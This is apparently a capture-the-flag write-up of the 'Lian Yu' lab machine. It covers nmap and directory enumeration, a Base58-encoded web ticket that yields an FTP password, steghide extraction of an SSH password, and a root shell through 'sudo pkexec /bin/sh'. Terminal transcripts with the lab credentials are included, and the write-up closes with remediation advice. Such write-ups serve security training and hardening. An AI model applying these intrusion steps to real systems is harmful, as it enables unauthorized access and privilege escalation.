Base58 ticket, FTP stego chain, and sudo pkexec root
Foundations Linux engagement: island path enumeration and Base58 decoding unlocked FTP; steghide and zip contents yielded slade’s SSH password; sudo pkexec completed root.
- Case files
- Base58 ticket, FTP stego chain, and sudo pkexec root
Web enum under /island produced a Base58 ticket for FTP. Stego extraction recovered slade’s password; NOPASSWD pkexec spawned a root shell.
green_arrow.ticket Base58-decoded to the FTP password for vigilante.
steghide passphrase password extracted shado; SSH as slade with M3tahuman.
NOPASSWD pkexec spawned /bin/sh as root.
Engagement summary
Web enum under /island produced a Base58 ticket for FTP. Stego extraction recovered slade’s password; NOPASSWD pkexec spawned a root shell.
LIAN YU (10.49.161.195) exposed FTP, SSH, HTTP, and RPC. Directory brute force found /island/2100/green_arrow.ticket; Base58 decoding of RTy8yhBQdscX produced !#th3h00d for FTP user vigilante. Downloaded images included a repaired PNG passphrase password; steghide on aa.jpg extracted ss.zip containing shado with M3tahuman. SSH as slade succeeded. sudo -l allowed /usr/bin/pkexec; sudo pkexec /bin/sh returned root.
Business impact
Encoded tickets in web trees are still credentials. Stego on FTP shares and weak SSH passwords complete the foothold. Unrestricted pkexec via sudo is root. Remove secrets from static content, authenticate FTP, and never grant pkexec NOPASSWD.
Island enum and FTP access
green_arrow.ticket Base58-decoded to the FTP password for vigilante.
OPERATOR · WEB / FTP
savvy@lab:~$ nmap -sV -sC 10.49.161.195
21/tcp open ftp
22/tcp open ssh
80/tcp open http
savvy@lab:~$ dirsearch -u http://10.49.161.195/island/2100 -e .ticket
/island/2100/green_arrow.ticket
# Base58 RTy8yhBQdscX → !#th3h00d
savvy@lab:~$ ftp 10.49.161.195
Name: vigilante
ftp> get aa.jpg
Stego to slade SSH
steghide passphrase password extracted shado; SSH as slade with M3tahuman.
OPERATOR · STEGO / SSH
savvy@lab:~$ steghide extract -sf aa.jpg -p password
wrote extracted data to ss.zip
savvy@lab:~$ unzip ss.zip && cat shado
M3tahuman
savvy@lab:~$ ssh slade@10.49.161.195
savvy@lab:~$
sudo pkexec to root
NOPASSWD pkexec spawned /bin/sh as root.
OPERATOR · ROOT
savvy@lab:~$ sudo -l
(root) NOPASSWD: /usr/bin/pkexec
savvy@lab:~$ sudo pkexec /bin/sh
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Do not publish encoded credentials on web paths. Restrict FTP and scrub stego-capable media. Remove pkexec from sudoers; use least-privilege named commands only.